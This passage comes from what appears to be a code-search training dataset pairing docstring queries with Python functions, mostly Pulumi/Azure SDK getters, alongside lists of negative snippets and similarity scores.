to the\n # policy protocol definition, to an index in the keys list.\n key_index = key_version - 1\n if key_index < 0:\n return None\n if key_index >= len(self.keys):\n if self.rotate_keys_automatically:\n key_index %= len(self.keys)\n else:\n return None\n return self.keys[key_index]", "def test_get_a_vault_by_pubkey(self):\n pass", "def privKeyVersion(privK, cur, isCompressed = True):\n\tisWIF, comment = isWif(privK, cur)\n\tif isWIF is True:\n\t\tif isCompressed is True:\n\t\t\tprivK = enc.decode(enc.encode(enc.decode(privK, 58), 256)[1:-5], 256)\n\t\telse:\n\t\t\tprivK = enc.decode(enc.encode(enc.decode(privK, 58), 256)[1:-4], 256)\n\telif isHex(privK):\n\t\tprivK = enc.decode(privK, 16)\n\telif isBase64(privK):\n\t\tprivK = privK.decode('base64', 'strict')\n\telif isBase6(privK):\n\t\tprivK = privK.decode('base6', 'strict')\n\treturn privK", "def load_key():\n return open(\"Secret.key\",\"rb\").read()", "def key_vault_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"key_vault_id\")", "def key_encryption_key(self) -> Optional[pulumi.Input['KeyVaultAndKeyReferenceArgs']]:\n return pulumi.get(self, \"key_encryption_key\")", "def compare_versions_key(x):\n return cmp_to_key(compare_versions)(x)", "def fastlyversion(args):\n pprint(api.version(service_id, args[0]).attrs)", "def download_key():\n data = check_args(('cloudProvider', ))\n provider = jobs.init_provider(data, True)\n key = encrypt_key(provider.get_key(), data['username'])\n return make_response(keyName=provider.keyname, key=key)", "async def version(self) -> dict:\n if not self.http_session:\n raise RuntimeError('Client has been disconnected')\n\n version_url = f'http://{self.host}:{self.port:d}/json/version'\n\n logger.debug('GET %s', version_url)\n resp = await self.http_session.get(version_url)\n resp.raise_for_status()\n\n return await resp.json()", "def private_key(self):", "def _get_version(self):\n if _cbc_version is None:\n return _extract_version('')\n return _cbc_version", "def public_key(self):", "def get_version(self) -> Dict[str, str]:\n return self.http.get(self.config.paths.version)" ]
[ "0.6438031", "0.63502395", "0.63091785", "0.62830764", "0.62450016", "0.6224766", "0.62174904", "0.6146448", "0.6091593", "0.5932736", "0.5924557", "0.5905134", "0.5850796", "0.5846698", "0.5845496", "0.57633024", "0.5708141", "0.5634579", "0.5590769", "0.5518944", "0.5513102", "0.5503286", "0.55009097", "0.5458534", "0.5449937", "0.5446579", "0.54443514", "0.54143703", "0.5397326", "0.53962845" ]
0.6812989
0
The list of virtual network rules.
def virtual_network_rules(self) -> Optional[Sequence['outputs.VirtualNetworkRuleResponse']]: return pulumi.get(self, "virtual_network_rules")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def virtual_network_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:\n return pulumi.get(self, \"virtual_network_rules\")", "def virtual_network_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['StorageAccountSpecNetworkRuleVirtualNetworkRulesArgs']]]]:\n return pulumi.get(self, \"virtual_network_rules\")", "def virtual_network_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['EventhubNamespaceSpecNetworkRuleVirtualNetworkRulesArgs']]]]:\n return pulumi.get(self, \"virtual_network_rules\")", "def getListOfRules(self):\n return self.model.getListOfRules()", "def get_rules(self):\n rules = []\n for item in self.rule:\n rules.append(item)\n return rules", "def get_rules(self):\n rules = []\n for item in self.name:\n rules.append(item)\n return rules", "def getListOfRules(self, *args):\n return _libsbml.Model_getListOfRules(self, *args)", "def get_rules(self):\n # TODO: Implement\n self.traverse2(self.tree, [])\n return self.rules", "def rules(self) -> List['outputs.PreventionInspectTemplateInspectConfigRuleSetRule']:\n return pulumi.get(self, \"rules\")", "def list_role_inference_rules(self):\n raise exception.NotImplemented() # pragma: no cover", "def vrules(self):\n ...", "def filter_rules(self) -> list:\n return self.transform(self._tree), self._rules", "def get_rules(cls):\n raise NotImplementedError()", "def rules(self) -> Optional[Sequence['outputs.RuleWithOperations']]:\n return pulumi.get(self, \"rules\")", "def rules(self) -> Optional[Sequence['outputs.RuleWithOperations']]:\n return pulumi.get(self, \"rules\")", "def rules(self) -> Optional[Sequence['outputs.RuleWithOperationsPatch']]:\n return pulumi.get(self, \"rules\")", "def rules(self) -> Optional[Sequence['outputs.RuleWithOperationsPatch']]:\n return pulumi.get(self, \"rules\")", "def rules(self):\n return tuple(e for e in self.entries if e.is_rule)", "def rules(cls):\n rules_CityscapesValConfig = {\"batch_size\": {\"type\": int},\n \"list_path\": {\"type\": str}\n }\n return rules_CityscapesValConfig", "def rules(self) -> pulumi.Output[Sequence['outputs.BucketLifecycleConfigurationV2Rule']]:\n return pulumi.get(self, \"rules\")", "def get_rules(cls) -> list:\n return [factory() for factory in cls._rules_factories]", "def rules(cls):\n rules_CityscapesTrainConfig = {\"batch_size\": {\"type\": int},\n \"list_path\": {\"type\": str}\n }\n return rules_CityscapesTrainConfig", "def ip_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['StorageAccountSpecNetworkRuleIpRulesArgs']]]]:\n return pulumi.get(self, \"ip_rules\")", "def ip_rules(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['EventhubNamespaceSpecNetworkRuleIpRulesArgs']]]]:\n return pulumi.get(self, \"ip_rules\")", "def get_rules(self):\n return [phi for psi in self._Psi for phi in psi]", "def rules(self) -> FrozenOrderedSet[Union[Callable, Rule]]:\n return self._rules", "def create_url_rules(self):\n return []", "def rules(self) -> pulumi.Input[Sequence[pulumi.Input['BucketLifecycleConfigurationV2RuleArgs']]]:\n return pulumi.get(self, \"rules\")", "def get_nat_rules():\n url = '{}/packetfilter/nat'.format(common_bits.base_url)\n result = common_bits.get_request(url, common_bits.headers, common_bits.payload)\n\n return result.json()", "def eqv_path_rules(self) -> List[Tuple[CombinatorialClassType, Rule]]:\n eqv_path_rules = []\n curr = self.comb_class\n for rule in self.rules:\n eqv_path_rules.append((curr, rule))\n curr = rule.children[0]\n return eqv_path_rules" ]
[ "0.776357", "0.77235216", "0.76376677", "0.7382955", "0.7215082", "0.6944976", "0.6879922", "0.68092316", "0.65993077", "0.63442385", "0.629894", "0.6288252", "0.62423277", "0.6196568", "0.6196568", "0.61666393", "0.61666393", "0.6166045", "0.61336064", "0.6104291", "0.608563", "0.6024484", "0.6022135", "0.60164726", "0.5996033", "0.59706944", "0.5952349", "0.5930842", "0.59297276", "0.59103996" ]
0.792192
1
Maps the region to the regional custom subdomain.
def customsubdomain(self) -> Optional[str]: return pulumi.get(self, "customsubdomain")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def bucket_regional_domain_name(self) -> str:\n ...", "def custom_sub_domain_name(self) -> Optional[str]:\n return pulumi.get(self, \"custom_sub_domain_name\")", "def bucket_regional_domain_name(self) -> str:\n return jsii.get(self, \"bucketRegionalDomainName\")", "def bucket_regional_domain_name(self) -> str:\n return jsii.get(self, \"bucketRegionalDomainName\")", "def get_aws_domain(region: str):\n if region.startswith(\"cn-\"):\n return \"amazonaws.com.cn\"\n elif region.startswith(\"us-iso-\"):\n return \"c2s.ic.gov\"\n elif region.startswith(\"us-isob-\"):\n return \"sc2s.sgov.gov\"\n else:\n return \"amazonaws.com\"", "def custom_domain(self):\n return self._custom_domain", "def subdomain(self, subdomain):\r\n return subdomains.Subdomain(self, subdomain)", "def getSubdomain(self):\n\t\treturn self.Subdomain", "def custom_domain(self, custom_domain):\n self._custom_domain = custom_domain", "def subdomain(self, subdomain):\n return subdomains.Subdomain(self, subdomain)", "def custom_domain(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"custom_domain\")", "def custom_domain(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"custom_domain\")", "def custom_domain(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"custom_domain\")", "def domain(self, domain):", "def bucket_regional_domain_name(self) -> typing.Optional[str]:\n return self._values.get('bucket_regional_domain_name')", "def domainRouter(self, domain, subrouter):\n pass", "def add_subdomain_output(self,filename,ll_x,ll_y, ur_x, ur_y, epsgIN,start,stop,step):\n bounds = []\n bounds.append([ll_x,ll_y])\n bounds.append([ur_x,ur_y])\n bounds = convert_points(bounds,epsgIN,4326) #convert bounds to Lat Long\n\n bounds = LL2LocalRicom(bounds, self.ricom.lat0, self.ricom.long0, self.ricom.latoff, self.ricom.longoff) #convert bounds to Local Ricom Coordinated\n self.run_nc.add_subdomain_output(filename,bounds[0][0],bounds[0][1], bounds[1][0], bounds[1][1],start,stop,step)\n \n #self.grid.get_grid_bounds()", "def subdomain(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"subdomain\")", "def set_subdomains(self, f):\n s = \"::: setting 2D subdomains :::\"\n print_text(s, cls=self)\n\n self.ff = MeshFunction('size_t', self.mesh)\n self.cf = MeshFunction('size_t', self.mesh)\n self.ff_acc = MeshFunction('size_t', self.mesh)\n f.read(self.ff, 'ff')\n f.read(self.cf, 'cf')\n f.read(self.ff_acc, 'ff_acc')\n \n self.ds = Measure('ds')[self.ff]\n self.dx = Measure('dx')[self.cf]\n \n self.dx_g = self.dx(0) # internal above grounded\n self.dx_f = self.dx(1) # internal above floating\n self.dBed_g = self.ds(3) # grounded bed\n self.dBed_f = self.ds(5) # floating bed\n self.dBed = self.ds(3) + self.ds(5) # bed\n self.dSrf_gu = self.ds(8) # grounded with U observations\n self.dSrf_fu = self.ds(9) # floating with U observations\n self.dSrf_u = self.ds(8) + self.ds(9) # surface with U observations\n self.dSrf_g = self.ds(2) + self.ds(8) # surface of grounded ice\n self.dSrf_f = self.ds(6) + self.ds(9) # surface of floating ice\n self.dSrf = self.ds(6) + self.ds(2) \\\n + self.ds(8) + self.ds(9) # surface\n self.dLat_d = self.ds(7) # lateral divide\n self.dLat_to = self.ds(4) # lateral terminus overwater\n self.dLat_tu = self.ds(10) # lateral terminus underwater\n self.dLat_t = self.ds(4) + self.ds(10) # lateral terminus\n self.dLat = self.ds(4) + self.ds(7) \\\n + self.ds(10) # lateral", "def par_domain(self):", "def set_by_domain(domain):\r\n if not has_configuration_set() or not domain:\r\n return\r\n\r\n for key, value in settings.MICROSITE_CONFIGURATION.items():\r\n subdomain = value.get('domain_prefix')\r\n if subdomain and domain.startswith(subdomain):\r\n _set_current_microsite(key, subdomain, domain)\r\n return\r\n\r\n # if no match on subdomain then see if there is a 'default' microsite defined\r\n # if so, then use that\r\n if 'default' in settings.MICROSITE_CONFIGURATION:\r\n _set_current_microsite('default', subdomain, domain)", "def relevant_domains(self):\n pass", "def subdomain(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"subdomain\")", "def setNodeDNSDomain(self,node,domain):\n post_data = {'search': str(domain)}\n data = self.connect('put',\"nodes/%s/dns\" % (node), post_data)\n return data", "def domain( self ):\n raise NotImplementedError(\"domain\")", "def block_override_domain(self) -> str:\n return pulumi.get(self, \"block_override_domain\")", "def add_subdomain_output(self,filename,ll_x,ll_y, ur_x, ur_y,start,stop,step,area_id = 0): \n \n self.number_of_subdomains += 1\n self.subdomains.number_of_subdomains = self.number_of_subdomains #set the 'number_of_subdomains' attribute \n name = 'subdomain' + str(self.number_of_subdomains) \n self.subdomainGroups.append(self.subdomains.createGroup(name) ) #great a new subdomain Group\n \n self.subdomainGroups[self.number_of_subdomains-1].filename = filename #set the bounds attributes for the subdomain\n\n self.subdomainGroups[self.number_of_subdomains-1].ll_x = ll_x #set the bounds attributes for the subdomain\n self.subdomainGroups[self.number_of_subdomains-1].ll_y = ll_y\n self.subdomainGroups[self.number_of_subdomains-1].ur_x = ur_x\n self.subdomainGroups[self.number_of_subdomains-1].ur_y = ur_y\n self.subdomainGroups[self.number_of_subdomains-1].start = start\n self.subdomainGroups[self.number_of_subdomains-1].stop = stop\n self.subdomainGroups[self.number_of_subdomains-1].step = step\n self.subdomainGroups[self.number_of_subdomains-1].area_id = area_id", "def subdomain(self, domain=None, subdomain=None):\n\n return self.subdomain_class(apiobj=self, domainname=domain,\n subdomain=subdomain)", "def get_single_zone(self, region):\n # TODO: Implement zones list\n # Hardcoded to us-west2\n z = {\n \"us-west2\": ['us-west2-a', 'us-west2-b', 'us-west2-c'],\n \"us-west1\": ['us-west1-a', 'us-west1-b', 'us-west1-c']\n }\n return z[region][:1]", "def set_region(sender, instance, *args, **kwargs):\n if instance.geocity and not instance.georegion:\n instance.georegion = instance.geocity.region" ]
[ "0.66863793", "0.5875713", "0.584936", "0.584936", "0.5845517", "0.58098024", "0.58075595", "0.5707554", "0.56916225", "0.55765885", "0.5548106", "0.5548106", "0.5548106", "0.55425155", "0.55297667", "0.5515043", "0.5466608", "0.54244334", "0.53858924", "0.5385837", "0.5327297", "0.5300162", "0.522155", "0.5172126", "0.5146798", "0.5141667", "0.512851", "0.51187336", "0.51168954", "0.5070745" ]
0.61522025
1
Gets the count of downgrades.
def count_of_downgrades(self) -> Optional[float]: return pulumi.get(self, "count_of_downgrades")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def count_of_upgrades_after_downgrades(self) -> Optional[float]:\n return pulumi.get(self, \"count_of_upgrades_after_downgrades\")", "def count_downvotes(self):\n return self.filter(value=-1).count()", "def data_downgrades():\n pass", "def data_downgrades():\n pass", "def get_downlink_cnt(self) -> int:\n\n try:\n self._serial.transmit(b'\\x55\\x00')\n response = self._get_reply(0x55, 4, 0.25)\n finally:\n self._gpio.sleep()\n\n return int.from_bytes(response[2:6], 'little', signed=False)", "def getDownloadCount(self):\n if self.downloadcount == -1:\n self.downloadcount = self.db.downloadcount()\n\n return self.downloadcount", "def dump_updown_count(self):\n raise NotImplementedError(\"Should implement dump_updown_count()\")", "def decreases_remaining(self):\n return 2 - self.decreases_today", "def downloads(self):\n return self.proto.details.appDetails.numDownloads", "def get_downvotes(self, obj):\n content_type = ContentType.objects.get_for_model(obj)\n\n votes = self.filter(content_type=content_type, object_id=obj._get_pk_val(), vote__exact=DOWNVOTE).aggregate(downvotes=Sum('vote'))\n\n if votes['downvotes'] is None:\n votes['downvotes'] = 0\n\n return -votes['downvotes']", "def get_download_count(self):\n downloads = self.driver.find_elements(*DownloadFileLocators.DOWNLOADS)\n return len(downloads)", "def showNbLevelLose(self) :\n nbLevelLose = 0\n for level in self.level_history :\n if level.result == 0:\n nbLevelLose += 1\n Scenario.messageGetNbLevelLose(nbLevelLose)", "def get_remaining_count(self):\n return self.total_count - self.count", "def get_devs_count(self):\n\t\treturn call_sdk_function('PrlVmCfg_GetDevsCount', self.handle)", "def fourth_down_attempts(self):\n return self._fourth_down_attempts", "def alerts_count(self) -> int:\n return pulumi.get(self, \"alerts_count\")", "def get_death_count(self, envelope):\n # type: (BaseRetryPolicy, Envelope) -> int\n death_header = envelope.get_header('x-death')\n\n if death_header is None:\n return 0\n\n count = 0\n for death in death_header:\n if not death['queue'].startswith(self.consumer.queue_name):\n continue\n count += death.get('count', 1)\n return count", "def get_usb_devs_count(self):\n\t\treturn call_sdk_function('PrlSrvCfg_GetUsbDevsCount', self.handle)", "def get_tries(self):\n return self._tries", "async def _get_num_open_trades(self) -> int:\n\n num = 0\n\n for pair in self.trades:\n num += len(self.trades[pair]['open'])\n\n return num", "def count(self):\n return self.get_count()", "def countEdges(self):\n n = 0\n for (hub, table) in self.totsupport.iteritems():\n n += len(table)\n return n", "def third_down_attempts(self):\n return self._third_down_attempts", "def counter(self) -> int:\n return self._fail_counter", "def DownloadedPacketCount(self):\n if self.force_auto_sync:\n self.get('DownloadedPacketCount')\n return self._DownloadedPacketCount", "def unsubscribed_member_count(self):\n return self._unsubscribed_member_count", "def get_count(self):\n\n\t\treturn self.__count", "def no_locked_budgets(self) -> int:\n count = 0\n for budget in self.budgets.values():\n if budget.locked:\n count += 1\n return count", "def get_count(self):\r\n return self.count", "def get_count(self):\n return self.count" ]
[ "0.8287235", "0.67211527", "0.62132925", "0.62132925", "0.6082984", "0.6066136", "0.59956974", "0.59314454", "0.5926545", "0.58456475", "0.57416725", "0.563767", "0.5635512", "0.56127214", "0.55500185", "0.54669005", "0.5453762", "0.5427202", "0.542651", "0.54143727", "0.5398292", "0.5368816", "0.5354835", "0.5325718", "0.5319959", "0.5312474", "0.53027296", "0.52890384", "0.5285044", "0.5281087" ]
0.8500595
0
Gets the count of upgrades after downgrades.
def count_of_upgrades_after_downgrades(self) -> Optional[float]: return pulumi.get(self, "count_of_upgrades_after_downgrades")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def count_of_downgrades(self) -> Optional[float]:\n return pulumi.get(self, \"count_of_downgrades\")", "def getUpgrades(self) -> list:\n return self.state[UPGRADES]", "def count_downvotes(self):\n return self.filter(value=-1).count()", "def dump_updown_count(self):\n raise NotImplementedError(\"Should implement dump_updown_count()\")", "def downloads(self):\n return self.proto.details.appDetails.numDownloads", "def data_downgrades():\n pass", "def data_downgrades():\n pass", "def needs_upgrade(self):\n return self.__api.call('dashboards/needs_upgrade',\n id_dashboard=self.id)", "def get_num_updates(self):\n return self._num_updates", "def decreases_remaining(self):\n return 2 - self.decreases_today", "async def on_upgrade_complete(self, upgrade: UpgradeId):", "def UpgradeProgress(self):\n if self.force_auto_sync:\n self.get('UpgradeProgress')\n return self._UpgradeProgress", "def get_downlink_cnt(self) -> int:\n\n try:\n self._serial.transmit(b'\\x55\\x00')\n response = self._get_reply(0x55, 4, 0.25)\n finally:\n self._gpio.sleep()\n\n return int.from_bytes(response[2:6], 'little', signed=False)", "def getDownloadCount(self):\n if self.downloadcount == -1:\n self.downloadcount = self.db.downloadcount()\n\n return self.downloadcount", "def slow_upd_count(self):\n return self.upd_type_count(\"slow\", [0] * 24)", "def get_download_count(self):\n downloads = self.driver.find_elements(*DownloadFileLocators.DOWNLOADS)\n return len(downloads)", "def test_list_upgrades_absent(self):\n pkg_cmd = MagicMock(return_value=\"\")\n\n with patch.dict(pkgng.__salt__, {\"cmd.run_stdout\": pkg_cmd}):\n result = pkgng.list_upgrades(refresh=False)\n self.assertDictEqual(result, {})\n pkg_cmd.assert_called_with(\n [\"pkg\", \"upgrade\", \"--dry-run\", \"--quiet\", \"--no-repo-update\"],\n output_loglevel=\"trace\",\n python_shell=False,\n ignore_retcode=True,\n )", "def countEdges(self):\n n = 0\n for (hub, table) in self.totsupport.iteritems():\n n += len(table)\n return n", "def need_upgrade(self):\n dashboards = self.__api.call('dashboards/need_upgrade_list')['dashboards']\n return [Dashboard(self.__api, x['dashboard']) for x in dashboards]", "def showNbLevelLose(self) :\n nbLevelLose = 0\n for level in self.level_history :\n if level.result == 0:\n nbLevelLose += 1\n Scenario.messageGetNbLevelLose(nbLevelLose)", "def db_downgrade(step):\n to_use = [_.strip('.sql') for _ in migration_files()]\n\n # since it's a downgrade, a reverse of the migration is essential\n to_use.reverse()\n\n generate_migration_file()\n dbd_query = anosql.from_path(MIGRATION_FILE, 'psycopg2')\n\n try:\n count = 0\n for _ in to_use:\n count += 1\n if MySQLScheme.fetch_one(REVISION_EXISTS,\n **{\"args\": {'revision': _}}):\n MySQLScheme.commit(getattr(dbd_query, f\"downgrade_{_}\").sql)\n LOGGER.info(f\"successful downgrade: {_}\")\n if count == step:\n break\n except errors.ProgrammingError:\n print(\"no more downgrade left\")", "def reg_upd_count(self):\n return self.upd_type_count(\"regular\", [0] * 24)", "def unsubscribed_member_count(self):\n return self._unsubscribed_member_count", "def get_tries(self):\n return self._tries", "def UpgradeState(self):\n if self.force_auto_sync:\n self.get('UpgradeState')\n return self._UpgradeState", "def retained_backups(self) -> int:\n return pulumi.get(self, \"retained_backups\")", "def getAllUpgrades(self):\n\t\tquery = ''\n\t\tconn = self.get_connection()\n\t\theaders = { 'Content-type' : 'application/json', 'Authorization' : 'A10 %s' %self.sessionid}\n\t\tconn.request('GET', self.get_path() + '/' + query, headers=headers)\n\t\tresponse = conn.getresponse()\n\t\texpected_status = 200\n\t\terrors = {500: 'An unexpected runtime exception'}\n\t\tpayload = self.get_output(response, expected_status, errors)\n\t\tconn.close()\n\t\tif self.debug:\n\t\t\tprint 'payload:', payload\n\t\tif payload == '':\n\t\t\tpayload = None\n\t\tif payload is not None:\n\t\t\tdata = json.loads(payload)\n\t\t\tpayload= data.get('upgradeList')\n\t\treturn deserialize_list_Upgrade_json(payload)", "def fourth_down_attempts(self):\n return self._fourth_down_attempts", "def num_updates(self):\r\n return len(self.q(css='section.updates section article').results)", "def n_versions(self):\n return len(self.onxs)" ]
[ "0.7273881", "0.62744755", "0.5958437", "0.58793324", "0.58278257", "0.5820554", "0.5820554", "0.5792164", "0.578981", "0.57145786", "0.5697508", "0.56740063", "0.5644544", "0.5571523", "0.5564085", "0.55153704", "0.5468588", "0.54553634", "0.5416293", "0.5406054", "0.5377968", "0.5367723", "0.53643954", "0.53409886", "0.5338278", "0.5319654", "0.5314328", "0.53141546", "0.5309367", "0.53017086" ]
0.8690283
0
Gets the last change date.
def last_change_date(self) -> Optional[str]: return pulumi.get(self, "last_change_date")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def svn_info_t_last_changed_date_get(svn_info_t_self): # real signature unknown; restored from __doc__\n pass", "def dt_last_update(self):\n return self.last_update", "def status_change_date(self) -> str:\n return pulumi.get(self, \"status_change_date\")", "def __last_commit_date(self):\n return utils.run('git', ['log', '--all', '-1', '--format=%cI'],\n self.__project.location).rstrip()", "def lastdate(self):\n if hasattr(self, \"_lastdate\"):\n return self._lastdate\n else:\n return None", "def last_date(self):\n if self._last_date is None:\n raise ValueError(\"Run pick() method before access this property\")\n return self._last_date", "def last_commit_date():\n return subprocess.check_output(['git', 'log', '-1', '--pretty=%ad',\n '--date=format:%d %b %H:%M', 'py/calendon']).decode().strip()", "def last_contribution_date(self):\n from kitsune.customercare.models import Reply\n from kitsune.questions.models import Answer\n from kitsune.wiki.models import Revision\n\n dates = []\n\n # Latest Army of Awesome reply:\n try:\n aoa_reply = Reply.objects.filter(\n user=self.user).latest('created')\n dates.append(aoa_reply.created)\n except Reply.DoesNotExist:\n pass\n\n # Latest Support Forum answer:\n try:\n answer = Answer.objects.filter(\n creator=self.user).latest('created')\n dates.append(answer.created)\n except Answer.DoesNotExist:\n pass\n\n # Latest KB Revision edited:\n try:\n revision = Revision.objects.filter(\n creator=self.user).latest('created')\n dates.append(revision.created)\n except Revision.DoesNotExist:\n pass\n\n # Latest KB Revision reviewed:\n try:\n revision = Revision.objects.filter(\n reviewer=self.user).latest('reviewed')\n # Old revisions don't have the reviewed date.\n dates.append(revision.reviewed or revision.created)\n except Revision.DoesNotExist:\n pass\n\n if len(dates) == 0:\n return None\n\n return max(dates)", "def last_changed(self):\n return self._last_changed", "def get_last_update(self):\n return self.ticker.all().order_by('-created').first()", "def last_update(self):\n return self._last_update", "def last_update(self):\n return self._last_update", "def last_status_change(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"last_status_change\")", "def get_latest_date(cls):\n\n return cls.query.order_by(desc(cls.date)).first().date", "def last_changed_utc(self) -> str:\n return pulumi.get(self, \"last_changed_utc\")", "def get_rates_grid_last_modified_date(self):\n return self.get_specific_column_value_from_grid(self.rates_grid_div_id, self.rates_grid_row_count, self.last_modified_column_name)", "def get_last_modified_date(self):\n\t\treturn call_sdk_function('PrlFsEntry_GetLastModifiedDate', self.handle)", "def get_last_modified_date(self):\n\t\treturn call_sdk_function('PrlVmCfg_GetLastModifiedDate', self.handle)", "def last_edit(self) -> datetime.datetime:\n self.update_status()\n return datetime.datetime.fromtimestamp(self._last_edit)", "def previous_date(self):\n yesterday = pendulum.yesterday('UTC')\n last_update = self.storage.last_update(self.feed)\n if not last_update or last_update < yesterday:\n last_update = yesterday\n return last_update", "def getModifiedDate(self, *args):\n return _libsbml.ModelHistory_getModifiedDate(self, *args)", "def get_last_time(self):\n \n return self._last", "def last_modified_at(self):\n return self.viztrail.last_modified_at", "def last_modified_at(self) -> str:\n return pulumi.get(self, \"last_modified_at\")", "def last_modified_at(self) -> str:\n return pulumi.get(self, \"last_modified_at\")", "def last_modified(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"last_modified\")", "def last(self) -> 'outputs.CommitmentPeriodResponse':\n return pulumi.get(self, \"last\")", "def last_updated(self):\n return self._last_updated", "def getLastUpdate():\n swDB = switchdb.DB()\n lastupdate = swDB.getLastUpdate()\n swDB.close()\n return lastupdate", "def last_modified(self) -> str:\n\t\tif not self._closed:\n\t\t\ttimestamp = self.ds.last_modified()\n\t\t\treturn timestamp\n\t\treturn None" ]
[ "0.7332252", "0.7219531", "0.71956813", "0.71701235", "0.71467483", "0.7004979", "0.69549567", "0.69372267", "0.69336087", "0.68705344", "0.68644184", "0.68644184", "0.6829638", "0.68113947", "0.67973435", "0.6780454", "0.67783314", "0.6749812", "0.67184407", "0.67096853", "0.66737", "0.6654765", "0.66333526", "0.6621378", "0.6621378", "0.6605566", "0.6584556", "0.6575649", "0.65624493", "0.6552003" ]
0.8572634
0
Ignore missing vnet service endpoint or not.
def ignore_missing_vnet_service_endpoint(self) -> Optional[bool]: return pulumi.get(self, "ignore_missing_vnet_service_endpoint")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def ignore_missing_v_net_service_endpoint(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"ignore_missing_v_net_service_endpoint\")", "def ignore_missing_service_endpoint(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"ignore_missing_service_endpoint\")", "def test_no_endpoint_ignore_service_type(self):\n self.assert_service_disabled(\n 'monitoring',\n \"Not in the list of requested service_types.\",\n # 'monitoring' absent from this list\n service_types={'compute', 'orchestration', 'bogus'},\n )", "def test_no_endpoint(self):\n self.os_fixture.v3_token.remove_service('monitoring')\n conn = self._get_conn()\n # Monasca is not in the service catalog\n self.assertRaises(\n ks_exc.catalog.EndpointNotFound, getattr, conn, 'monitoring'\n )", "def __init__(__self__, *,\n ignore_missing_v_net_service_endpoint: Optional[pulumi.Input[bool]] = None,\n subnet_id: Optional[pulumi.Input[str]] = None):\n if ignore_missing_v_net_service_endpoint is not None:\n pulumi.set(__self__, \"ignore_missing_v_net_service_endpoint\", ignore_missing_v_net_service_endpoint)\n if subnet_id is not None:\n pulumi.set(__self__, \"subnet_id\", subnet_id)", "def test_unknown_service(self):\n raise NotImplementedError # FIXME", "def test_no_such_conf_section_ignore_service_type(self):\n del self.oslo_config_dict['heat']\n self.assert_service_disabled(\n 'orchestration',\n \"Not in the list of requested service_types.\",\n # 'orchestration' absent from this list\n service_types=['compute'],\n )", "def endpoint_absent(name, region=None, profile=None, interface=None, **connection_args):\n ret = {\n \"name\": name,\n \"changes\": {},\n \"result\": True,\n \"comment\": 'Endpoint for service \"{}\"{} is already absent'.format(\n name,\n ', interface \"{}\",'.format(interface) if interface is not None else \"\",\n ),\n }\n\n # Check if service is present\n endpoint = __salt__[\"keystone.endpoint_get\"](\n name, region, profile=profile, interface=interface, **connection_args\n )\n if not endpoint:\n return ret\n else:\n if __opts__.get(\"test\"):\n ret[\"result\"] = None\n ret[\"comment\"] = 'Endpoint for service \"{}\" will be deleted'.format(name)\n return ret\n # Delete service\n __salt__[\"keystone.endpoint_delete\"](\n name, region, profile=profile, interface=interface, **connection_args\n )\n ret[\"comment\"] = 'Endpoint for service \"{}\"{} has been deleted'.format(\n name,\n ', interface \"{}\",'.format(interface) if interface is not None else \"\",\n )\n ret[\"changes\"][\"endpoint\"] = \"Deleted\"\n return ret", "def test_no_adapter_opts_ignore_service_type(self):\n self.oslo_config_dict['heat'] = None\n self.assert_service_disabled(\n 'orchestration',\n \"Not in the list of requested service_types.\",\n # 'orchestration' absent from this list\n service_types=['compute'],\n )", "def _remove_endpoint(self, endpoint):\n logger.debug('')\n with self._endpoint_lock:\n count = len(self._endpoints)\n self._endpoints = [e for e in self._endpoints if e != endpoint]\n return (count != len(self._endpoints))", "def validate_endpoint(cmd, namespace):\n n = namespace\n\n if not n.endpoint:\n n.endpoint = get_config_value(cmd, 'communication', 'endpoint', None)", "def test_get_virtual_service(self):\n pass", "def unrecognised_service(service_name):\n print('Service {} not (yet) supported.'.format(service_name))\n pass", "def test_missing_endpoint(self, req):\n req.side_effect = ks_exc.EndpointNotFound()\n self.client._get_resource_provider(self.context, \"fake\")\n\n # reset the call count to demonstrate that future calls still\n # work\n req.reset_mock()\n self.client._get_resource_provider(self.context, \"fake\")\n self.assertTrue(req.called)", "def test_unauthenticated_service_blocked(self):\n raise NotImplementedError # FIXME", "def default_vpc_endpoint_service_factory( # type: ignore[misc]\n service_region: str,\n zones: List[str],\n service: str = \"\",\n service_type: str = \"Interface\",\n private_dns_names: bool = True,\n special_service_name: str = \"\",\n policy_supported: bool = True,\n base_endpoint_dns_names: Optional[List[str]] = None,\n ) -> List[Dict[str, Any]]: # pylint: disable=too-many-arguments\n if special_service_name:\n service_name = f\"com.amazonaws.{service_region}.{special_service_name}\"\n else:\n service_name = f\"com.amazonaws.{service_region}.{service}\"\n\n if not base_endpoint_dns_names:\n base_endpoint_dns_names = [f\"{service}.{service_region}.vpce.amazonaws.com\"]\n\n endpoint_service = {\n \"AcceptanceRequired\": False,\n \"AvailabilityZones\": zones,\n \"BaseEndpointDnsNames\": base_endpoint_dns_names,\n \"ManagesVpcEndpoints\": False,\n \"Owner\": \"amazon\",\n \"ServiceId\": f\"vpce-svc-{BaseBackend.vpce_random_number()}\",\n \"ServiceName\": service_name,\n \"ServiceType\": [{\"ServiceType\": service_type}],\n \"Tags\": [],\n \"VpcEndpointPolicySupported\": policy_supported,\n }\n\n # Don't know how private DNS names are different, so for now just\n # one will be added.\n if private_dns_names:\n endpoint_service[\n \"PrivateDnsName\"\n ] = 